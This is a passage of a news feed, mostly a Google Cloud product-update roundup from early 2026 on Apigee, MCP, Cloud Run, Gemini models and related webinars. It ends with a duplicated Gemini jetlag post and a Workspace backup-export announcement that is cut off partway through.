&lt;li&gt;&lt;strong&gt;Upgrading Apigee OPDK to 4.53 with OS Modernization&lt;br /&gt;&lt;/strong&gt;Modernize your infrastructure using Google’s official, sequential upgrade path. Our Technical expert, Rakesh Talanki outlines how to upgrade Apigee OPDK to v4.53 while migrating to a supported OS (RHEL 8.x/9.x). This guide covers the "build-out" methodology, including multi-data center syncing, to ensure a stable, zero-downtime transition&lt;br /&gt;&lt;br /&gt;&lt;a href="https://goo.gle/3Oa8uqy" rel="noopener" target="_blank"&gt;Read the guide&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Cloud Run Worker Pools and CREMA: Powering Serverless AI at Scale&lt;br /&gt;&lt;/strong&gt;Google Cloud has announced the General Availability of &lt;strong&gt;Cloud Run worker pools&lt;/strong&gt;, a new resource type designed specifically for pull-based, non-HTTP workloads. Unlike traditional Cloud Run services that scale based on request traffic, worker pools provide an "always-on" environment for background tasks like processing message queues or running large-scale AI inference. To support this, Google Cloud also open-sourced the &lt;strong&gt;Cloud Run External Metrics Autoscaler (CREMA)&lt;/strong&gt;. Built on KEDA, CREMA enables queue-aware autoscaling for worker pools, allowing them to dynamically scale based on external signals like Pub/Sub backlog or Kafka lag.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Apigee Model Context Protocol (MCP) now Generally Available&lt;br /&gt;&lt;/strong&gt;Expose enterprise APIs as MCP tools for agentic AI applications with the General Availability of MCP in Apigee. This update allows developers to transform APIs into AI-ready tools using OpenAPI Specifications, removing the need for local MCP servers or additional infrastructure. With managed endpoints and semantic search in API hub, you can now provide AI agents with secure, governed access to enterprise data at scale.&lt;br /&gt;&lt;br /&gt;&lt;a href="https://goo.gle/3QfoEQ4" rel="noopener" target="_blank"&gt;&lt;em&gt;Explore the MCP overview&lt;/em&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Apr 6 - Apr 10&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Community TechTalk: Powering Retail Agents with ADK, UCP &amp;amp; Apigee X&lt;br /&gt;&lt;/strong&gt;Move beyond basic chatbots to secure, transactional AI experiences. Join our Community TechTalk on April 16 to learn how Apigee X and Gemini build a "Trust Layer" for AI shopping assistants using UCP standards. We’ll demonstrate how to block prompt injections with Model Armor and implement cost governance via token limits to secure the path from discovery to purchase.&lt;br /&gt;&lt;br /&gt;&lt;a href="https://goo.gle/41ocUgq" rel="noopener" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt;Register for the TechTalk&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Implement multimodal capabilities in your AI agents&lt;br /&gt;&lt;/strong&gt;Explore three new reference architectures for building sophisticated multi-agent AI systems that can process and analyze multimodal data. To analyze disparate multimodal data and produce a high-confidence classification, see &lt;a href="https://docs.cloud.google.com/architecture/agentic-ai-classify-multimodal-data"&gt;&lt;span style="vertical-align: baseline;"&gt;Classify multimodal data&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. To create a fluid conversational AI that processes audio and video streams in real time, see&lt;/span&gt; &lt;a href="https://docs.cloud.google.com/architecture/agentic-ai-bidirectional-multimodal-streaming"&gt;&lt;span style="vertical-align: baseline;"&gt;Enable live bidirectional multimodal streaming&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. To consolidate fragmented multimodal data into a searchable knowledge graph, see&lt;/span&gt; &lt;a href="https://docs.cloud.google.com/architecture/agentic-ai-multimodal-graph-rag-resource-orchestration"&gt;&lt;span style="vertical-align: baseline;"&gt;Multimodal GraphRAG resource orchestration&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Automate SecOps workflows with an agentic AI system&lt;br /&gt;&lt;/strong&gt;To accelerate incident response and reduce manual toil for your security team, you need a system that can automate remediation playbooks. Our new reference architecture helps you build an AI agent that orchestrates complex triage and investigation workflows across disparate security tools, such as SIEM, CSPM, and EDR, from a single interface. See the full guide to &lt;a href="https://docs.cloud.google.com/architecture/agentic-ai-orchestrate-security-ops-workflows"&gt;&lt;span style="vertical-align: baseline;"&gt;orchestrate security operations workflows&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Mar 30 - Apr 3&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;ASEAN Webinar | April 30: Mastering Agentic Governance at Scale with GCP&lt;br /&gt;&lt;/strong&gt;As AI agents move from experimental pilots to core enterprise functions, governance is the critical next step. Join Google Cloud experts &lt;strong&gt;Shilpi Puri &amp;amp; Wely Lau&lt;/strong&gt; for a &lt;strong&gt;webinar&lt;/strong&gt; on &lt;strong&gt;April 30th at 11:00 AM SGT&lt;/strong&gt; to learn how to architect a secure AI Management layer. We’ll explore developing governed MCP endpoints, managing tool access to enterprise data, and operationalizing AI with robust audit logs. The session includes a live demo of these frameworks in action on Google Cloud.&lt;br /&gt;&lt;br /&gt;&lt;a href="https://goo.gle/47FX1Wn" rel="noopener" target="_blank"&gt;&lt;strong&gt;RSVP here.&lt;/strong&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Mar 23 - Mar 27&lt;/h3&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Turn your API sprawl into an agent-ready catalog&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;As organizations scale, APIs often become scattered across multiple gateways, creating "blind spots" that hinder AI adoption. To solve this, we’ve introduced two new capabilities for Apigee API hub: a new integration with API Gateway to automatically centralize API metadata into a single control plane, and a specification boost add-on (now in public preview). This add-on uses AI to enhance your API documentation with the precise examples and error codes that AI agents need to function reliably.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;a href="https://goo.gle/47dEYqc" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Read the full blog post to get started.&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Webinar | April 16: AI Command &amp;amp; Control&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;As AI agents move from experimental pilots to core enterprise functions, governance is the critical next step. Join Google Cloud expert Satyam Maloo for a webinar on April 16th at 11:00 AM IST to learn how to architect a secure AI Management layer. We’ll explore developing governed MCP endpoints, managing tool access to enterprise data, and operationalizing AI with robust audit logs. The session includes a live demo of these frameworks in action on Google Cloud.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;a href="https://goo.gle/4t43Vg4" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;RSVP here.&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Modernizing and Decoupling Event Ingestion with Apigee&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;In modern cloud-native architectures, decoupling producers from consumers is critical for building resilient systems. While Google Cloud Pub/Sub provides a scalable backbone, exposing it directly to external clients can introduce security and management overhead. This new guide explores how to leverage Apigee as an intelligent HTTP ingestion point. Learn how to handle security, mediation, and traffic control before messages reach your internal bus using the PublishMessage policy or Pub/Sub API.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="https://goo.gle/3POgsWF" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Read the full guide.&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Mar 16 - Mar 20&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Gemini-powered Assistant in BigQuery Studio Gets Context-Aware Upgrades&lt;br /&gt;&lt;/strong&gt;The Gemini-powered assistant in BigQuery Studio has been transformed into a fully context-aware analytics partner, supporting your entire data lifecycle. The new capabilities include intelligent resource discovery, which uses Dataplex Universal Catalog search to find resources across projects and deep dive into metadata using natural language. You can now automate tasks, such as scheduling production-grade queries directly through the chat interface, and instantly troubleshoot long-running or failed jobs with root cause analysis and cost control auditing.&lt;br /&gt;&lt;br /&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/use-cloud-assist"&gt;Explore&lt;/a&gt; the full range of what the assistant can do.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Mar 9 - Mar 13&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;div&gt;&lt;strong&gt;Want to use Gemini to develop code and don't know where to start?&lt;/strong&gt;&lt;br /&gt;This &lt;a href="https://medium.com/google-cloud/supercharge-your-spark-development-with-gemini-1540f1cb47d4" rel="noopener" target="_blank"&gt;article&lt;/a&gt; includes a couple of examples of developing code with Gemini prompts; it identified changes that were needed to be made to get the code working. The article also refers to other examples that are available on github. &lt;/div&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Mar 2 - Mar 6&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong&gt;Introducing Gemini 3.1 Flash-Lite, our fastest and most cost-efficient Gemini 3 series model.&lt;/strong&gt; Built for high-volume developer workloads at scale, 3.1 Flash-Lite delivers high quality for its price and model tier. Gemini 3.1 Flash-Lite can tackle tasks at scale, like high-volume translation and content moderation, where cost is a priority. And it can also handle more complex workloads where more in-depth reasoning is needed, like generating user interfaces and dashboards, creating simulations or following instructions.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Starting today, 3.1 Flash-Lite is rolling out in preview to enterprises via &lt;/span&gt;&lt;a href="https://console.cloud.google.com/vertex-ai/studio/multimodal?mode=prompt&amp;amp;model=gemini-3.1-flash-lite-preview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Vertex AI&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;developers via the Gemini API in &lt;/span&gt;&lt;a href="https://aistudio.google.com/prompts/new_chat?model=gemini-3.1-flash-lite-preview" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google AI Studio&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;p&gt;&lt;strong&gt;TechTalk: Implementing Device Authorization Grant (RFC 8628) for Apigee&lt;/strong&gt;&lt;br /&gt;Learn how to authorize "headless" devices like Smart TVs or AI agents that lack keyboards and browsers. Join our Community TechTalk on March 19 (5PM CET / 12PM EDT) to go under the hood of Apigee X/Hybrid. We’ll cover the real-world mechanics of state management, polling, and human-in-the-loop security patterns for devices and autonomous agents.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://goo.gle/4r6o6Zi" rel="noopener" target="_blank"&gt;Register for the TechTalk&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Feb 23 - Feb 27&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong&gt;Pro-level image generation gets faster and more accessible with Nano Banana 2&lt;br /&gt;&lt;/strong&gt;&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Nano Banana 2 is our state-of-the-art image generation and editing model. It delivers Pro-level image generation and editing at the speed you expect from Flash — making the quality, reasoning, and world knowledge you loved about Nano Banana Pro more accessible. Learn more about the model &lt;/span&gt;&lt;a href="https://blog.google/innovation-and-ai/technology/ai/nano-banana-2" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;The Intelligent Path to Compliance: Transforming Regulatory QC with Google Cloud&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Reducing "Refuse to File" (RTF) risks and submission cycle times is critical for life sciences leaders. Google Cloud’s Regulatory Submission Semantic QC Auditor leverages Gemini and RAG architecture to transform Quality Control from a manual burden into an active, intelligent workflow.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By automating semantic cross-referencing, narrative coherence checks, and dynamic guidance-based auditing, this solution ensures rigorous accuracy and auditability. Operating within a secure GxP-ready environment, it empowers teams to detect subtle inconsistencies and generate remediation plans without sacrificing data privacy. &lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;a href="https://discuss.google.dev/t/the-intelligent-path-to-compliance-transforming-regulatory-quality-control-with-google-cloud/335276" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Learn more&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Stop typing, start interacting! &lt;strong&gt;The Gemini Live Agent Challenge is here&lt;/strong&gt;. Build immersive agents that can help you see, hear, and speak using Gemini and Google Cloud. Compete for your share of $80,000+ in prizes and a trip to Google Cloud Next '26!&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Submissions are open from February 16, 2026 to March 16, 2026. Learn more and register at &lt;/span&gt;&lt;a href="http://geminiliveagentchallenge.devpost.com/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;geminiliveagentchallenge.devpost.com&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Feb 9 - Feb 13&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;&lt;span style="vertical-align: baseline;"&gt;Introducing Gemini 3.1 Pro on Google Cloud. &lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;span style="vertical-align: baseline;"&gt;3.1 Pro is a noticeably smarter, more capable baseline for complex problem-solving. We’re shipping 3.1 Pro at scale, building upon our &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/gemini-3-is-available-for-enterprise?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;goal&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to help you transform your business for the agentic future. Learn more about the model’s capabilities &lt;/span&gt;&lt;a href="https://blog.google/innovation-and-ai/models-and-research/gemini-models/gemini-3-1-pro" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. Gemini 3.1 Pro is available starting today in preview in &lt;/span&gt;&lt;a href="https://cloud.google.com/vertex-ai?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Vertex AI&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://cloud.google.com/gemini-enterprise?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Enterprise&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. Developers can access the model in preview via the Gemini API in &lt;/span&gt;&lt;a href="https://aistudio.google.com/prompts/new_chat?model=gemini-3.1-pro-preview" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google AI Studio&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://developer.android.com/studio" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Android Studio&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://antigravity.google/blog/gemini-3-1-in-google-antigravity" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Antigravity&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, and &lt;/span&gt;&lt;a href="https://geminicli.com/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini CLI&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Automate Storage Compatibility with GKE Dynamic Default Storage Classes&lt;br /&gt;&lt;/strong&gt;Managing storage across mixed-generation VM clusters in GKE just got easier. With the new &lt;strong&gt;Dynamic Default Storage Class&lt;/strong&gt;, Google Kubernetes Engine automatically selects between Persistent Disk (PD) and Hyperdisk based on a node's specific hardware compatibility. This abstraction eliminates the need for complex scheduling rules and manual pairing, ensuring your volumes "just work" regardless of the underlying infrastructure. By defining both variants in a single class, you reduce operational overhead while maintaining peak performance and cost-efficiency across your entire cluster.&lt;br /&gt;&lt;br /&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/concepts/hyperdisk#automated_disk_type_selection" rel="noopener" target="_blank"&gt;Explore automated disk type selection&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Community TechTalk: AI-Powered Apigee Development with strofa.io&lt;br /&gt;&lt;/strong&gt;&lt;strong style="vertical-align: baseline;"&gt;Join the Apigee community on February 26&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; for a deep dive into&lt;/span&gt; &lt;a href="https://www.google.com/search?q=http://strofa.io" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;strofa.io&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. Guest speaker Denis Kalitviansky will demonstrate how this new AI-powered tool automates and orchestrates Apigee development, from local emulators to large-scale hybrid environments. Discover how to scale your API management and streamline team collaboration using the latest in AI-driven automation.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://goo.gle/3Oerns3" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Register now to reserve your spot.&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Jan 26 - Jan 30&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;&lt;span style="vertical-align: baseline;"&gt;Simplify API Governance with Native OpenAPI v3 Support&lt;br /&gt;&lt;/span&gt;&lt;/strong&gt;Eliminate integration debt and accelerate deployment velocity with the General Availability of OpenAPI v3 (OASv3) support for API Gateway and Cloud Endpoints. You no longer need to downgrade modern specifications to OASv2. Instead, you can now define API contracts and enforce critical policies—including telemetry, quotas, and security—using native Google-specific extensions directly within your OASv3 files. This update ensures your APIs are secure by design while remaining fully compatible with the modern developer ecosystem and Google Cloud’s AI services.&lt;br /&gt;&lt;br /&gt;&lt;a href="https://goo.gle/49Wx58Z" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Get started with OpenAPI v3 on API Gateway and Cloud Endpoints.&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;&lt;span style="vertical-align: baseline;"&gt;Accelerate API Testing with the New Open Source API Tester&lt;br /&gt;&lt;/span&gt;&lt;/strong&gt;Start validating your APIs with API Tester, a simple, YAML-based Test Driven Development (TDD) framework. Designed for the Apigee community, this tool allows you to write human-readable tests, run them instantly via a web client or CLI, and perform deep unit testing on Apigee proxies. With native support for JSONPath assertions and Apigee shared flows, you can verify everything from payload data to internal variables like &lt;code style="vertical-align: baseline;"&gt;proxy.basepath&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; without leaving your terminal.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;a href="https://goo.gle/4q5WDGK" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Explore the API Tester guide and start testing your proxies today.&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;span style="vertical-align: baseline;"&gt;Secure Sensitive Data with Kubernetes Secrets in Apigee hybrid&lt;br /&gt;&lt;/span&gt;&lt;/strong&gt;Enhance security in Apigee hybrid by accessing Kubernetes Secrets directly within your API proxies. This hybrid-exclusive feature keeps sensitive credentials within your cluster boundary and prevents replication to the management plane. It supports strict separation of duties: operators manage secrets via &lt;code style="vertical-align: baseline;"&gt;kubectl&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, while developers reference them as secure flow variables—ideal for high-compliance and GitOps workflows.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;a href="https://goo.gle/4qEVffo" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Implement Kubernetes Secrets in your hybrid proxies.&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;span style="vertical-align: baseline;"&gt;See the Console in a Whole New Light: Dark Mode is Now Generally Available in Google Cloud&lt;br /&gt;&lt;/span&gt;&lt;/strong&gt;Elevate your cloud management workflow with Dark Mode, now generally available in the Google Cloud console. We have delivered a modern, cohesive, and accessible experience reimagined for maximum comfort and productivity—especially during extended working hours and low-light environments. Dark Mode can be enabled automatically based on your operating system's preference, or manually through the Settings  -&amp;gt; Appearance menu.&lt;br /&gt;&lt;br /&gt;&lt;a href="https://docs.cloud.google.com/docs/get-started/console-appearance"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Switch to Dark Mode today to enjoy a modern, comfortable, and productive environment!&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;span style="vertical-align: baseline;"&gt;Apigee X Networking: PSC or VPC Peering?&lt;br /&gt;&lt;/span&gt;&lt;/strong&gt;Deciding how to connect Apigee X? Watch this video to compare Private Service Connect and VPC Peering. We break down northbound and southbound routing, IP consumption, and how to reach targets on-prem or in the cloud. Learn to simplify your architecture and avoid common networking "gotchas" for a smoother deployment.&lt;br /&gt;&lt;br /&gt;&lt;a href="https://goo.gle/4bWBGdV" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Watch the video.&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Jan 19 - Jan 23&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Bridge the Gap: Excel-to-API Conversion in Apigee Portals&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Give your customers more ways to connect! This new article by Tyler Ayers explores how to extend the Apigee Integrated Portal to support direct Excel file uploads. By leveraging SheetJS and custom portal scripts, you can enable users to upload spreadsheets, preview data, and submit it directly to your APIs, all without writing a single line of integration code themselves. It’s a powerful way to simplify onboarding for those who aren't yet API-ready.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;a href="https://goo.gle/3Nq3Pjo" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Learn how to build it&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Elevate your applications with Firestore’s new advanced query engine&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;We have fundamentally reimagined Firestore with pipeline operations for Enterprise edition. Experience a powerful new engine featuring over a hundred new query features, index-less queries, new index types, and observability tooling to improve query performance. Seamlessly migrate using built-in tools and leverage Firestore’s existing differentiated serverless foundation, virtually unlimited scale, and industry-leading SLA. Join a community of 600K developers to craft expressive applications that maximize the benefits of rich queryability, real-time listen queries, robust offline caching, and cutting-edge AI-assistive coding integrations.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/data-analytics/new-firestore-query-engine-enables-pipelines?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Learn more about Firestore pipeline operations.&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/topics/inside-google-cloud/whats-new-google-cloud" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-26T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/products/gemini/gemini-help-avoid-jetlag</id>
    <title>Here's how Gemini can help you avoid jetlag.</title>
    <updated>2026-06-26T16:00:00+00:00</updated>
    <content type="html">&lt;img src="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/Avoid_jetlag_with_Gemini.max-600x600.format-webp.webp" /&gt;If you’ve got a faraway trip coming up, the Gemini app can help you avoid jetlag so you can make the most of your visit.Once you’ve given Gemini permission to access you…</content>
    <link href="https://blog.google/products-and-platforms/products/gemini/gemini-help-avoid-jetlag" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-26T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/products/gemini/gemini-help-avoid-jetlag/</id>
    <title>Here's how Gemini can help you avoid jetlag.</title>
    <updated>2026-06-26T16:00:00+00:00</updated>
    <content type="html">&lt;img src="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/Avoid_jetlag_with_Gemini.max-600x600.format-webp.webp" /&gt;If you’ve got a faraway trip coming up, the Gemini app can help you avoid jetlag so you can make the most of your visit.Once you’ve given Gemini permission to access you…</content>
    <link href="https://blog.google/products-and-platforms/products/gemini/gemini-help-avoid-jetlag/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-26T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/06/streamline-your-data-backups-with-incremental-exports-for-Google-Workspace.html</id>
    <title>Streamline your data backups with incremental exports for Google Workspace</title>
    <updated>2026-06-26T15:00:46+00:00</updated>
    <content type="html">Google Workspace administrators can now utilize incremental exports when backing up organizational data. Instead of re-exporting their entire organization's data, admins can export frequent snapshots of their data into their organization’s own &lt;a href="https://cloud.google.com/storage/docs/buckets" target="_blank"&gt;Google Cloud Storage (GCS) bucket&lt;/a&gt;.&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Key benefits include faster completion times, reduced Google Cloud Storage consumption and costs, and the ability to establish more frequent backup schedules to mitigate the risk of potential data loss.&amp;nbsp;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Specifically, admins can schedule automated exports for &lt;b&gt;Gmail, Drive, and Chat&lt;/b&gt;, with the flexibility to scope data by &lt;b&gt;organizational unit (OU), group, or specific users&lt;/b&gt;. They can initiate:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Periodic full backups - establishing a baseline snapshot through regular full exports&lt;/li&gt;&lt;ul&gt;&lt;li&gt;Quarterly (every 3 months)&lt;/li&gt;&lt;li&gt;Semi-annually (every 6 months)&lt;/li&gt;&lt;li&gt;Annually (every year)&lt;/li&gt;&lt;/ul&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Frequent incremental backups - supplementing the baseline with frequent incremental backups, such as backing up data from the "last x days" every "y days"&lt;/li&gt;&lt;ul&gt;&lt;li&gt;Capture data from the last 5 days, running every 3 days&lt;/li&gt;&lt;li&gt;Capture data from the last 7 days, running every 5 days&lt;/li&gt;&lt;/ul&gt;&lt;/ul&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhg2yfsbVCUG598Udv2pq8rd39eLjocnHD-OxXyhuyXtzOrB7HXTnEyqNsOl-ECulubijb3LAZrgt3pScCt2rJkTa9oFvBa5DCtJHK3MWX0ZGmA2HJeVWrGL0FZTeQ6A6DMBvHmosdeIFF1plsiqQI2ShGzHm5euA4YcU1aJ29HO4mo3jAyzkUgtJa8ZgI/s1054/Streamline%20your%20data%20backups%20with%20incremental%20exports%20for%20Google%20Workspace%20-%206604%20-%201.png" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" 